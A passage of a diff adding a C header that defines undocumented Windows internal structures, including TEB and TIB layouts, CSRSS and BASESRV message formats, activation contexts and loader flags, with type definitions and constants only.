StackLimit; + DWORD SubSystemTib; + union { + DWORD FiberData; + DWORD Version; + }; + DWORD ArbitraryUserPointer; + DWORD Self; +} NT_TIB32, *PNT_TIB32; + +typedef struct _NT_TIB64 { + DWORD64 ExceptionList; + DWORD64 StackBase; + DWORD64 StackLimit; + DWORD64 SubSystemTib; + union { + DWORD64 FiberData; + DWORD Version; + }; + DWORD64 ArbitraryUserPointer; + DWORD64 Self; +} NT_TIB64, *PNT_TIB64; +#endif + +typedef struct _TEB32 +{ + NT_TIB32 NtTib; + + WOW64_POINTER(PVOID) EnvironmentPointer; + CLIENT_ID32 ClientId; + WOW64_POINTER(PVOID) ActiveRpcHandle; + WOW64_POINTER(PVOID) ThreadLocalStoragePointer; + WOW64_POINTER(PPEB) ProcessEnvironmentBlock; + + ULONG LastErrorValue; + ULONG CountOfOwnedCriticalSections; + WOW64_POINTER(PVOID) CsrClientThread; + WOW64_POINTER(PVOID) Win32ThreadInfo; + ULONG User32Reserved[26]; + ULONG UserReserved[5]; + WOW64_POINTER(PVOID) WOW32Reserved; + LCID CurrentLocale; + ULONG FpSoftwareStatusRegister; + WOW64_POINTER(PVOID) SystemReserved1[54]; + NTSTATUS ExceptionCode; + WOW64_POINTER(PVOID) ActivationContextStackPointer; + BYTE SpareBytes[36]; + ULONG TxFsContext; + + GDI_TEB_BATCH32 GdiTebBatch; + CLIENT_ID32 RealClientId; + WOW64_POINTER(HANDLE) GdiCachedProcessHandle; + ULONG GdiClientPID; + ULONG GdiClientTID; + WOW64_POINTER(PVOID) GdiThreadLocalInfo; + WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62]; + WOW64_POINTER(PVOID) glDispatchTable[233]; + WOW64_POINTER(ULONG_PTR) glReserved1[29]; + WOW64_POINTER(PVOID) glReserved2; + WOW64_POINTER(PVOID) glSectionInfo; + WOW64_POINTER(PVOID) glSection; + WOW64_POINTER(PVOID) glTable; + WOW64_POINTER(PVOID) glCurrentRC; + WOW64_POINTER(PVOID) glContext; + + NTSTATUS LastStatusValue; + UNICODE_STRING32 StaticUnicodeString; + WCHAR StaticUnicodeBuffer[261]; + + WOW64_POINTER(PVOID) DeallocationStack; + WOW64_POINTER(PVOID) TlsSlots[64]; + LIST_ENTRY32 TlsLinks; +} TEB32, *PTEB32; + +typedef + VOID + (*PPS_POST_PROCESS_INIT_ROUTINE) ( + VOID + ); + +typedef struct _TIB +{ + struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList; + PVOID StackBase; + PVOID StackLimit; + PVOID SubSystemTib; + + union + { + PVOID FiberData; + ULONG Version; + }; + + PVOID ArbitraryUserPointer; + struct _TIB *Self; +} TIB; +typedef TIB *PTIB; + +// +// inifile mapping +// + +typedef struct _NLS_USER_INFO +{ + + /**/ /*|0xa0|*/ WCHAR iCountry[80]; + /**/ /*|0xa0|*/ WCHAR sCountry[80]; + /**/ /*|0xa0|*/ WCHAR sList[80]; + /**/ /*|0xa0|*/ WCHAR iMeasure[80]; + /**/ /*|0xa0|*/ WCHAR iPaperSize[80]; + /**/ /*|0xa0|*/ WCHAR sDecimal[80]; + /**/ /*|0xa0|*/ WCHAR sThousand[80]; + /**/ /*|0xa0|*/ WCHAR sGrouping[80]; + /**/ /*|0xa0|*/ WCHAR iDigits[80]; + /**/ /*|0xa0|*/ WCHAR iLZero[80]; + /**/ /*|0xa0|*/ WCHAR iNegNumber[80]; + /**/ /*|0xa0|*/ WCHAR sNativeDigits[80]; + /**/ /*|0xa0|*/ WCHAR iDigitSubstitution[80]; + /**/ /*|0xa0|*/ WCHAR sCurrency[80]; + /**/ /*|0xa0|*/ WCHAR sMonDecSep[80]; + /**/ /*|0xa0|*/ WCHAR sMonThouSep[80]; + /**/ /*|0xa0|*/ WCHAR sMonGrouping[80]; + /**/ /*|0xa0|*/ WCHAR iCurrDigits[80]; + /**/ /*|0xa0|*/ WCHAR iCurrency[80]; + /**/ /*|0xa0|*/ WCHAR iNegCurr[80]; + /**/ /*|0xa0|*/ WCHAR sPosSign[80]; + /**/ /*|0xa0|*/ WCHAR sNegSign[80]; + /**/ /*|0xa0|*/ WCHAR sTimeFormat[80]; + /**/ /*|0xa0|*/ WCHAR s1159[80]; + /**/ /*|0xa0|*/ WCHAR s2359[80]; + /**/ /*|0xa0|*/ WCHAR sShortDate[80]; + /**/ /*|0xa0|*/ WCHAR sYearMonth[80]; + /**/ /*|0xa0|*/ WCHAR sLongDate[80]; + /**/ /*|0xa0|*/ WCHAR iCalType[80]; + /**/ /*|0xa0|*/ WCHAR iFirstDay[80]; + /**/ /*|0xa0|*/ WCHAR iFirstWeek[80]; + /**/ /*|0xa0|*/ WCHAR sLocale[80]; + /**/ /*|0xaa|*/ WCHAR sLocaleName[85]; + /**/ /*|0x4|*/ ULONG UserLocaleId; + /**/ /*|0x8|*/ struct _LUID InteractiveUserLuid; + /**/ /*|0x44|*/ UCHAR InteractiveUserSid[68]; + /**/ /*|0x4|*/ ULONG ulCacheUpdateCount; +} NLS_USER_INFO, *PNLS_USER_INFO; // + +typedef struct _INIFILE_MAPPING_TARGET +{ + struct _INIFILE_MAPPING_TARGET* Next; + struct _UNICODE_STRING RegistryPath; +} INIFILE_MAPPING_TARGET, *PINIFILE_MAPPING_TARGET; + +typedef struct _INIFILE_MAPPING_VARNAME +{ + struct _INIFILE_MAPPING_VARNAME* Next; + UNICODE_STRING Name; + ULONG MappingFlags; + struct _INIFILE_MAPPING_TARGET* MappingTarget; +} INIFILE_MAPPING_VARNAME, *PINIFILE_MAPPING_VARNAME; + +typedef struct _INIFILE_MAPPING_APPNAME +{ + struct _INIFILE_MAPPING_APPNAME* Next; + UNICODE_STRING Name; + struct _INIFILE_MAPPING_VARNAME* VariableNames; + struct _INIFILE_MAPPING_VARNAME* DefaultVarNameMapping; +} INIFILE_MAPPING_APPNAME, *PINIFILE_MAPPING_APPNAME; + +typedef struct _INIFILE_MAPPING_FILENAME +{ + struct _INIFILE_MAPPING_FILENAME* Next; + UNICODE_STRING Name; + struct _INIFILE_MAPPING_APPNAME* ApplicationNames; + struct _INIFILE_MAPPING_APPNAME* DefaultAppNameMapping; +} INIFILE_MAPPING_FILENAME, *PINIFILE_MAPPING_FILENAME; + +typedef struct _INIFILE_MAPPING +{ + struct _INIFILE_MAPPING_FILENAME* FileNames; + struct _INIFILE_MAPPING_FILENAME* DefaultFileNameMapping; + struct _INIFILE_MAPPING_FILENAME* WinIniFileMapping; + ULONG Reserved; +} INIFILE_MAPPING, *PINIFILE_MAPPING; + +#define PORT_CONNECT (0x0001) + +#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1) + +typedef struct _PORT_MESSAGE +{ + union { + struct + { + CSHORT DataLength; + CSHORT TotalLength; + } s1; + + ULONG Length; + + } u1; + + union + { + struct + { + CSHORT Type; + CSHORT DataInfoOffset; + } s2; + ULONG ZeroInit; + } u2; + + union + { + LPC_CLIENT_ID ClientId; + double DoNotUseThisField; // Force quadword alignment + }; + + ULONG MessageId; + union + { + LPC_SIZE_T ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message + ULONG CallbackId; // Only valid on LPC_REQUEST message + }; + // UCHAR Data[]; +} PORT_MESSAGE, *PPORT_MESSAGE; + +typedef struct _PORT_DATA_ENTRY { + LPC_PVOID Base; + ULONG Size; +} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY; + +typedef struct _PORT_DATA_INFORMATION { + ULONG CountDataEntries; + PORT_DATA_ENTRY DataEntries[1]; +} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION; + + // + // csrss & csrsrv related + // + + typedef ULONG CSR_API_NUMBER; + +#define CSR_API_PORT_NAME L"ApiPort" + + // + // This structure is filled in by the client prior to connecting to the CSR + // server. The CSR server will fill in the OUT fields if prior to accepting + // the connection. + // + + typedef struct _CSR_API_CONNECTINFO { + HANDLE ObjectDirectory; + PVOID SharedSectionBase; + PVOID SharedStaticServerData; + PVOID SharedSectionHeap; + ULONG DebugFlags; + ULONG SizeOfPebData; + ULONG SizeOfTebData; + ULONG NumberOfServerDllNames; + HANDLE ServerProcessId; + } CSR_API_CONNECTINFO, *PCSR_API_CONNECTINFO; + + // + // Message format for messages sent from the client to the server + // + + typedef struct _CSR_CLIENTCONNECT_MSG + { + ULONG ServerDllIndex; + PVOID ConnectionInformation; + ULONG ConnectionInformationLength; + } CSR_CLIENTCONNECT_MSG, *PCSR_CLIENTCONNECT_MSG; // + +#define CSR_NORMAL_PRIORITY_CLASS 0x00000010 +#define CSR_IDLE_PRIORITY_CLASS 0x00000020 +#define CSR_HIGH_PRIORITY_CLASS 0x00000040 +#define CSR_REALTIME_PRIORITY_CLASS 0x00000080 + + typedef struct _CSR_CAPTURE_HEADER { + ULONG Length; + PVOID RelatedCaptureBuffer; + ULONG CountMessagePointers; + PCHAR FreeSpace; + ULONG_PTR MessagePointerOffsets[1]; // Offsets within CSR_API_MSG of pointers + } CSR_CAPTURE_HEADER, *PCSR_CAPTURE_HEADER; + +#define WINSS_OBJECT_DIRECTORY_NAME L"\\Windows" + +#define CSRSRV_SERVERDLL_INDEX 0 +#define CSRSRV_FIRST_API_NUMBER 0 + +#define BASESRV_SERVERDLL_INDEX 1 +#define BASESRV_FIRST_API_NUMBER 0 + +#define CONSRV_SERVERDLL_INDEX 2 +#define CONSRV_FIRST_API_NUMBER 512 + +#define USERSRV_SERVERDLL_INDEX 3 +#define USERSRV_FIRST_API_NUMBER 1024 + +#define CSR_MAKE_API_NUMBER( DllIndex, ApiIndex ) \ + (CSR_API_NUMBER)(((DllIndex) << 16) | (ApiIndex)) + +#define CSR_APINUMBER_TO_SERVERDLLINDEX( ApiNumber ) \ + ((ULONG)((ULONG)(ApiNumber) >> 16)) + +#define CSR_APINUMBER_TO_APITABLEINDEX( ApiNumber ) \ + ((ULONG)((USHORT)(ApiNumber))) + +typedef struct _CSR_NT_SESSION +{ + struct _LIST_ENTRY SessionLink; + ULONG SessionId; + ULONG ReferenceCount; + STRING RootDirectory; +} CSR_NT_SESSION, *PCSR_NT_SESSION; + +typedef struct _CSR_API_MSG +{ + PORT_MESSAGE h; + union + { + CSR_API_CONNECTINFO ConnectionRequest; + struct + { + PCSR_CAPTURE_HEADER CaptureBuffer; + CSR_API_NUMBER ApiNumber; + ULONG ReturnValue; + ULONG Reserved; + union + { + CSR_CLIENTCONNECT_MSG ClientConnect; + ULONG_PTR ApiMessageData[ 46 ]; + } u; + }; + }; +} CSR_API_MSG, *PCSR_API_MSG; + +typedef +ULONG (*PCSR_CALLBACK_ROUTINE)( + IN OUT PCSR_API_MSG ReplyMsg + ); + +typedef struct _CSR_CALLBACK_INFO +{ + ULONG ApiNumberBase; + ULONG MaxApiNumber; + PCSR_CALLBACK_ROUTINE *CallbackDispatchTable; +} CSR_CALLBACK_INFO, *PCSR_CALLBACK_INFO; + +// end csrss + + +// +// Time Zone +// + +typedef struct _RTL_DYNAMIC_TIME_ZONE_INFORMATION { + struct _RTL_TIME_ZONE_INFORMATION tzi; + WCHAR TimeZoneKeyName[ 128 ]; + UCHAR DynamicDaylightTimeDisabled; +} RTL_DYNAMIC_TIME_ZONE_INFORMATION, *PRTL_DYNAMIC_TIME_ZONE_INFORMATION; // + +// +// basesrv api +// + +typedef struct _BASESRV_API_CONNECTINFO +{ + ULONG ExpectedVersion; + HANDLE DefaultObjectDirectory; + ULONG WindowsVersion; + ULONG CurrentVersion; + ULONG DebugFlags; + WCHAR WindowsDirectory[ MAX_PATH ]; + WCHAR WindowsSystemDirectory[ MAX_PATH ]; +} BASESRV_API_CONNECTINFO, *PBASESRV_API_CONNECTINFO; + +typedef enum _BASESRV_API_NUMBER { + BasepCreateProcess = BASESRV_FIRST_API_NUMBER, + BasepCreateThread, + BasepGetTempFile, + BasepExitProcess, + BasepDebugProcess, + BasepCheckVDM, + BasepUpdateVDMEntry, + BasepGetNextVDMCommand, + BasepExitVDM, + BasepIsFirstVDM, + BasepGetVDMExitCode, + BasepSetReenterCount, + BasepSetProcessShutdownParam, + BasepGetProcessShutdownParam, + BasepSetVDMCurDirs, + BasepGetVDMCurDirs, + BasepBatNotification, + BasepRegisterWowExec, + BasepSoundSentryNotification, + BasepRefreshIniFileMapping, + BasepDefineDosDevice, + BasepSetTermsrvAppInstallMode, + BasepSetTermsrvClientTimeZone, + BasepSxsCreateActivationContext, + BasepDebugProcessStop, + BasepRegisterThread, + BasepDeferredCreateProcess, + BasepNlsGetUserInfo, + BasepNlsSetUserInfo, + BasepNlsUpdateCacheCount, + BasepMaxApiNumber +} BASESRV_API_NUMBER, *PBASESRV_API_NUMBER; + +typedef struct _BASE_NLS_SET_USER_INFO_MSG +{ + ULONG LCType; + USHORT* pData; + ULONG DataLength; +} BASE_NLS_SET_USER_INFO_MSG, *PBASE_NLS_SET_USER_INFO_MSG; + +typedef struct _BASE_NLS_GET_USER_INFO_MSG +{ + struct _NLS_USER_INFO* pData; + ULONG DataLength; +} BASE_NLS_GET_USER_INFO_MSG, *PBASE_NLS_GET_USER_INFO_MSG; + +typedef struct _BASE_NLS_UPDATE_CACHE_COUNT_MSG +{ + ULONG Reserved; +} BASE_NLS_UPDATE_CACHE_COUNT_MSG, *PBASE_NLS_UPDATE_CACHE_COUNT_MSG; + +typedef struct _BASE_UPDATE_VDM_ENTRY_MSG +{ + ULONG iTask; + ULONG BinaryType; + PVOID ConsoleHandle; + PVOID VDMProcessHandle; + PVOID WaitObjectForParent; + USHORT EntryIndex; + USHORT VDMCreationState; +} BASE_UPDATE_VDM_ENTRY_MSG, *PBASE_UPDATE_VDM_ENTRY_MSG; + +typedef struct _BASE_GET_NEXT_VDM_COMMAND_MSG +{ + ULONG iTask; + PVOID ConsoleHandle; + PVOID WaitObjectForVDM; + PVOID StdIn; + PVOID StdOut; + PVOID StdErr; + ULONG CodePage; + ULONG dwCreationFlags; + ULONG ExitCode; + PCHAR CmdLine; + PCHAR AppName; + PCHAR PifFile; + PCHAR CurDirectory; + PCHAR Env; + ULONG EnvLen; + struct _STARTUPINFOA* StartupInfo; + PCHAR Desktop; + ULONG DesktopLen; + PCHAR Title; + ULONG TitleLen; + PCHAR Reserved; + ULONG ReservedLen; + USHORT CurrentDrive; + USHORT CmdLen; + USHORT AppLen; + USHORT PifLen; + USHORT CurDirectoryLen; + USHORT VDMState; + UCHAR fComingFromBat; +} BASE_GET_NEXT_VDM_COMMAND_MSG, *PBASE_GET_NEXT_VDM_COMMAND_MSG; + +typedef struct _BASE_SHUTDOWNPARAM_MSG +{ + ULONG ShutdownLevel; + ULONG ShutdownFlags; +} BASE_SHUTDOWNPARAM_MSG, *PBASE_SHUTDOWNPARAM_MSG; + +typedef struct _BASE_GETTEMPFILE_MSG +{ + ULONG uUnique; +} BASE_GETTEMPFILE_MSG, *PBASE_GETTEMPFILE_MSG; + +typedef struct _BASE_DEBUGPROCESS_MSG +{ + ULONG dwProcessId; + CLIENT_ID DebuggerClientId; + PVOID AttachCompleteRoutine; +} BASE_DEBUGPROCESS_MSG, *PBASE_DEBUGPROCESS_MSG; // + +typedef struct _BASE_CHECKVDM_MSG +{ + ULONG iTask; + HANDLE ConsoleHandle; + ULONG BinaryType; + HANDLE WaitObjectForParent; + HANDLE StdIn; + HANDLE StdOut; + HANDLE StdErr; + ULONG CodePage; + ULONG dwCreationFlags; + PCHAR CmdLine; + PCHAR AppName; + PCHAR PifFile; + PCHAR CurDirectory; + PCHAR Env; + ULONG EnvLen; + LPSTARTUPINFOA StartupInfo; + PCHAR Desktop; + ULONG DesktopLen; + PCHAR Title; + ULONG TitleLen; + PCHAR Reserved; + ULONG ReservedLen; + USHORT CmdLen; + USHORT AppLen; + USHORT PifLen; + USHORT CurDirectoryLen; + USHORT CurDrive; + USHORT VDMState; + struct _LUID* UserLuid; +} BASE_CHECKVDM_MSG, *PBASE_CHECKVDM_MSG; + +typedef struct _BASE_GET_VDM_EXIT_CODE_MSG +{ + PVOID ConsoleHandle; + PVOID hParent; + ULONG ExitCode; +} BASE_GET_VDM_EXIT_CODE_MSG, *PBASE_GET_VDM_EXIT_CODE_MSG; // + +typedef struct _BASE_DEFERREDCREATEPROCESS_MSG +{ + struct _CLIENT_ID* ClientId; + ULONG NtUserFlags; +} BASE_DEFERREDCREATEPROCESS_MSG, *PBASE_DEFERREDCREATEPROCESS_MSG; // + +typedef struct _BASE_EXITPROCESS_MSG { + NTSTATUS uExitCode; +} BASE_EXITPROCESS_MSG, *PBASE_EXITPROCESS_MSG; // + +typedef struct _BASE_GET_SET_VDM_CUR_DIRS_MSG +{ + PVOID ConsoleHandle; + PCHAR lpszzCurDirs; + ULONG cchCurDirs; +} BASE_GET_SET_VDM_CUR_DIRS_MSG, *PBASE_GET_SET_VDM_CUR_DIRS_MSG; // + +typedef struct _BASE_SET_REENTER_COUNT +{ + PVOID ConsoleHandle; + ULONG fIncDec; +} BASE_SET_REENTER_COUNT, *PBASE_SET_REENTER_COUNT; // + +#if !defined(_WINNT_) || (defined(_MSC_VER) && (_MSC_VER >= 1300)) +typedef enum +{ + ACTCTX_RUN_LEVEL_UNSPECIFIED = 0, + ACTCTX_RUN_LEVEL_AS_INVOKER, + ACTCTX_RUN_LEVEL_HIGHEST_AVAILABLE, + ACTCTX_RUN_LEVEL_REQUIRE_ADMIN, + ACTCTX_RUN_LEVEL_NUMBERS +} ACTCTX_REQUESTED_RUN_LEVEL; + +typedef struct _ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION { + DWORD ulFlags; + ACTCTX_REQUESTED_RUN_LEVEL RunLevel; + DWORD UiAccess; +} ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION, * PACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION; + +typedef const struct _ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION * PCACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION; + + +#endif + +typedef struct _BASE_SXS_CREATEPROCESS_MSG +{ + ULONG Flags; + ULONG ProcessParameterFlags; + union + { + UNICODE_STRING CultureFallbacks; + ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION RunLevel; + UNICODE_STRING AssemblyName; + } u; +} BASE_SXS_CREATEPROCESS_MSG, *PBASE_SXS_CREATEPROCESS_MSG; // + + +typedef struct _BASE_CREATEPROCESS_MSG +{ + PVOID ProcessHandle; + PVOID ThreadHandle; + CLIENT_ID ClientId; + ULONG CreationFlags; + ULONG VdmBinaryType; + ULONG VdmTask; + PVOID hVDM; + struct _BASE_SXS_CREATEPROCESS_MSG Sxs; + ULONGLONG PebAddressNative; + ULONG PebAddressWow64; + USHORT ProcessorArchitecture; +} BASE_CREATEPROCESS_MSG, *PBASE_CREATEPROCESS_MSG; // + + +typedef struct _BASE_CREATETHREAD_MSG +{ + PVOID ThreadHandle; + CLIENT_ID ClientId; +} BASE_CREATETHREAD_MSG, *PBASE_CREATETHREAD_MSG; // + + +typedef struct _BASE_MSG_SXS_HANDLES +{ + PVOID File; + PVOID Process; + PVOID Section; + ULONGLONG ViewBase; +} BASE_MSG_SXS_HANDLES, *PBASE_MSG_SXS_HANDLES; // + + +typedef struct _BASE_EXIT_VDM_MSG +{ + PVOID ConsoleHandle; + ULONG iWowTask; + PVOID WaitObjectForVDM; +} BASE_EXIT_VDM_MSG, *PBASE_EXIT_VDM_MSG; // + + +typedef struct _BASE_IS_FIRST_VDM_MSG +{ + __int32 FirstVDM; +} BASE_IS_FIRST_VDM_MSG, *PBASE_IS_FIRST_VDM_MSG; // + + +typedef struct _BASE_SET_REENTER_COUNT_MSG +{ + PVOID ConsoleHandle; + ULONG fIncDec; +} BASE_SET_REENTER_COUNT_MSG, *PBASE_SET_REENTER_COUNT_MSG; // + + +typedef struct _BASE_BAT_NOTIFICATION_MSG +{ + PVOID ConsoleHandle; + ULONG fBeginEnd; +} BASE_BAT_NOTIFICATION_MSG, *PBASE_BAT_NOTIFICATION_MSG; // + + +typedef struct _BASE_REGISTER_WOWEXEC_MSG +{ + PVOID hEventWowExec; + PVOID ConsoleHandle; +} BASE_REGISTER_WOWEXEC_MSG, *PBASE_REGISTER_WOWEXEC_MSG; // + + +typedef struct _BASE_REFRESHINIFILEMAPPING_MSG +{ + UNICODE_STRING IniFileName; +} BASE_REFRESHINIFILEMAPPING_MSG, *PBASE_REFRESHINIFILEMAPPING_MSG; // + + +typedef struct _BASE_SET_TERMSRVCLIENTTIMEZONE +{ + struct _RTL_DYNAMIC_TIME_ZONE_INFORMATION* pDTZInfo; + ULONG ulDTZInfoSize; + KSYSTEM_TIME RealBias; + ULONG TimeZoneId; +} BASE_SET_TERMSRVCLIENTTIMEZONE, *PBASE_SET_TERMSRVCLIENTTIMEZONE; // + +typedef struct _BASE_SET_TERMSRVAPPINSTALLMODE +{ + __int32 bState; +} BASE_SET_TERMSRVAPPINSTALLMODE, *PBASE_SET_TERMSRVAPPINSTALLMODE; + + +typedef struct _BASE_SOUNDSENTRY_NOTIFICATION_MSG +{ + ULONG VideoMode; +} BASE_SOUNDSENTRY_NOTIFICATION_MSG, *PBASE_SOUNDSENTRY_NOTIFICATION_MSG; // + + +typedef struct _BASE_DEFINEDOSDEVICE_MSG +{ + ULONG Flags; + UNICODE_STRING DeviceName; + UNICODE_STRING TargetPath; +} BASE_DEFINEDOSDEVICE_MSG, *PBASE_DEFINEDOSDEVICE_MSG; // + +typedef struct _BASE_MSG_SXS_STREAM +{ + UCHAR FileType; + UCHAR PathType; + UCHAR HandleType; + UNICODE_STRING Path; + PVOID FileHandle; + HANDLE Handle; + unsigned __int64 Offset; + ULONG Size; +} BASE_MSG_SXS_STREAM, *PBASE_MSG_SXS_STREAM; // + + +typedef struct _BASE_SXS_CREATE_ACTIVATION_CONTEXT_MSG +{ + ULONG Flags; + USHORT ProcessorArchitecture; + UNICODE_STRING CultureFallbacks; + struct _BASE_MSG_SXS_STREAM Manifest; + struct _BASE_MSG_SXS_STREAM Policy; + UNICODE_STRING AssemblyDirectory; + UNICODE_STRING TextualAssemblyIdentity; + unsigned __int64 FileTime; + ULONG ResourceName; + PVOID ActivationContextData; + struct _ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION RunLevel; + UNICODE_STRING AssemblyName; +} BASE_SXS_CREATE_ACTIVATION_CONTEXT_MSG, *PBASE_SXS_CREATE_ACTIVATION_CONTEXT_MSG; // + + + +typedef struct _BASE_API_MSG +{ + PORT_MESSAGE h; + struct _CSR_CAPTURE_HEADER* CaptureBuffer; + CSR_API_NUMBER ApiNumber; + ULONG ReturnValue; + ULONG Reserved; + union + { /* size 0xb0*/ + BASE_NLS_SET_USER_INFO_MSG NlsSetUserInfo; + BASE_NLS_GET_USER_INFO_MSG NlsGetUserInfo; + BASE_NLS_UPDATE_CACHE_COUNT_MSG NlsCacheUpdateCount; + BASE_SHUTDOWNPARAM_MSG ShutdownParam; + BASE_CREATEPROCESS_MSG CreateProcess; + BASE_DEFERREDCREATEPROCESS_MSG DeferredCreateProcess; + BASE_CREATETHREAD_MSG CreateThread; + BASE_GETTEMPFILE_MSG GetTempFile; + BASE_EXITPROCESS_MSG ExitProcess; + BASE_DEBUGPROCESS_MSG DebugProcess; + BASE_CHECKVDM_MSG CheckVDM; + BASE_UPDATE_VDM_ENTRY_MSG UpdateVDMEntry; + BASE_GET_NEXT_VDM_COMMAND_MSG GetNextVDMCommand; + BASE_EXIT_VDM_MSG ExitVDM; + BASE_IS_FIRST_VDM_MSG IsFirstVDM; + BASE_GET_VDM_EXIT_CODE_MSG GetVDMExitCode; + BASE_SET_REENTER_COUNT SetReenterCount; + BASE_GET_SET_VDM_CUR_DIRS_MSG GetSetVDMCurDirs; + BASE_BAT_NOTIFICATION_MSG BatNotification; + BASE_REGISTER_WOWEXEC_MSG RegisterWowExec; + BASE_SOUNDSENTRY_NOTIFICATION_MSG SoundSentryNotification; + BASE_REFRESHINIFILEMAPPING_MSG RefreshIniFileMapping; + BASE_DEFINEDOSDEVICE_MSG DefineDosDeviceApi; + BASE_SET_TERMSRVAPPINSTALLMODE SetTermsrvAppInstallMode; + BASE_SET_TERMSRVCLIENTTIMEZONE SetTermsrvClientTimeZone; + BASE_SXS_CREATE_ACTIVATION_CONTEXT_MSG SxsCreateActivationContext; + } u; +} BASE_API_MSG, *PBASE_API_MSG; // + +typedef struct _BASE_STATIC_SERVER_DATA +{ + UNICODE_STRING WindowsDirectory; + UNICODE_STRING WindowsSystemDirectory; + UNICODE_STRING NamedObjectDirectory; + USHORT WindowsMajorVersion; + USHORT WindowsMinorVersion; + USHORT BuildNumber; + USHORT CSDNumber; + USHORT RCNumber; + WCHAR CSDVersion[128]; + SYSTEM_BASIC_INFORMATION SysInfo; + SYSTEM_TIMEOFDAY_INFORMATION TimeOfDay; + struct _INIFILE_MAPPING* IniFileMapping; + NLS_USER_INFO NlsUserInfo; + UCHAR DefaultSeparateVDM; + UCHAR IsWowTaskReady; + UNICODE_STRING WindowsSys32x86Directory; + UCHAR fTermsrvAppInstallMode; + RTL_DYNAMIC_TIME_ZONE_INFORMATION tziTermsrvClientTimeZone; + KSYSTEM_TIME ktTermsrvClientBias; + ULONG TermsrvClientTimeZoneId; + UCHAR LUIDDeviceMapsEnabled; + ULONG TermsrvClientTimeZoneChangeNum; +} BASE_STATIC_SERVER_DATA, *PBASE_STATIC_SERVER_DATA; // + +#define GDI_BATCH_BUFFER_SIZE 310 + +typedef struct _GDI_TEB_BATCH { + ULONG Offset; + UCHAR Alignment[4]; + ULONG_PTR HDC; + ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; +} GDI_TEB_BATCH,*PGDI_TEB_BATCH; + +typedef enum _EVENT_TYPE { + NotificationEvent, + SynchronizationEvent +} EVENT_TYPE; + +typedef enum _TIMER_TYPE { + NotificationTimer, + SynchronizationTimer +} TIMER_TYPE; + +typedef enum _WAIT_TYPE { + WaitAll, + WaitAny +} WAIT_TYPE; + +#define STATIC_UNICODE_BUFFER_LENGTH 261 +#define WIN32_CLIENT_INFO_LENGTH 62 + +#define WIN32_CLIENT_INFO_SPIN_COUNT 1 + +typedef PVOID* PPVOID; + +#define TLS_MINIMUM_AVAILABLE 64 + +typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY { + + ULONG Flags; + UNICODE_STRING DosPath; + PVOID Handle; +} ASSEMBLY_STORAGE_MAP_ENTRY, *PASSEMBLY_STORAGE_MAP_ENTRY; + +typedef struct _ASSEMBLY_STORAGE_MAP { + + ULONG Flags; + ULONG AssemblyCount; + struct _ASSEMBLY_STORAGE_MAP_ENTRY** AssemblyArray; +} ASSEMBLY_STORAGE_MAP, *PASSEMBLY_STORAGE_MAP; + +typedef struct _ACTIVATION_CONTEXT_DATA { + ULONG Magic; + ULONG HeaderSize; + ULONG FormatVersion; + ULONG TotalSize; + ULONG DefaultTocOffset; + ULONG ExtendedTocOffset; + ULONG AssemblyRosterOffset; + ULONG Flags; +} ACTIVATION_CONTEXT_DATA, *PACTIVATION_CONTEXT_DATA; + +typedef struct _ACTIVATION_CONTEXT { + + LONG RefCount; + ULONG Flags; + LIST_ENTRY Links; + struct _ACTIVATION_CONTEXT_DATA* ActivationContextData; + //void (NotificationRoutine)(unsigned long, struct _ACTIVATION_CONTEXT*, void*, void*, void*, unsigned char*); + struct _ACTIVATION_CONTEXT* NotificationRoutine; + PVOID NotificationContext; + ULONG SentNotifications[8]; + ULONG DisabledNotifications[8]; + struct _ASSEMBLY_STORAGE_MAP StorageMap; + struct _ASSEMBLY_STORAGE_MAP_ENTRY* InlineStorageMapEntries[32]; + ULONG StackTraceIndex; + PVOID StackTraces[4][4]; +} ACTIVATION_CONTEXT, *PACTIVATION_CONTEXT; // + +typedef struct _PEB_FREE_BLOCK { + struct _PEB_FREE_BLOCK *Next; + ULONG Size; +} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; + +typedef struct _PEB_LDR_DATA +{ + ULONG Length; + BOOLEAN Initialized; + HANDLE SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID EntryInProgress; + BOOLEAN ShutdownInProgress; + HANDLE ShutdownThreadId; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +typedef struct _INITIAL_TEB +{ + struct + { + PVOID OldStackBase; + PVOID OldStackLimit; + } OldInitialTeb; + + PVOID StackBase; + PVOID StackLimit; + PVOID StackAllocationBase; + +} INITIAL_TEB, *PINITIAL_TEB; + +typedef struct _WOW64_PROCESS +{ + PVOID Wow64; +} WOW64_PROCESS, *PWOW64_PROCESS; + +// +// Private flags for loader data table entries +// + +#define LDRP_STATIC_LINK 0x00000002 +#define LDRP_IMAGE_DLL 0x00000004 +#define LDRP_LOAD_IN_PROGRESS 0x00001000 +#define LDRP_UNLOAD_IN_PROGRESS 0x00002000 +#define LDRP_ENTRY_PROCESSED 0x00004000 +#define LDRP_ENTRY_INSERTED 0x00008000 +#define LDRP_CURRENT_LOAD 0x00010000 +#define LDRP_FAILED_BUILTIN_LOAD 0x00020000 +#define LDRP_DONT_CALL_FOR_THREADS 0x00040000 +#define LDRP_PROCESS_ATTACH_CALLED 0x00080000 +#define LDRP_DEBUG_SYMBOLS_LOADED 0x00100000 +#define LDRP_IMAGE_NOT_AT_BASE 0x00200000 +#define LDRP_COR_IMAGE 0x00400000 +#define LDRP_COR_OWNS_UNMAP 0x00800000 +#define LDRP_SYSTEM_MAPPED 0x01000000 +#define LDRP_IMAGE_VERIFYING 0x02000000 +#define LDRP_DRIVER_DEPENDENT_DLL 0x04000000 +#define LDRP_ENTRY_NATIVE 0x08000000 +#define LDRP_REDIRECTED 0x10000000 +#define LDRP_NON_PAGED_DEBUG_INFO 0x20000000 +#define 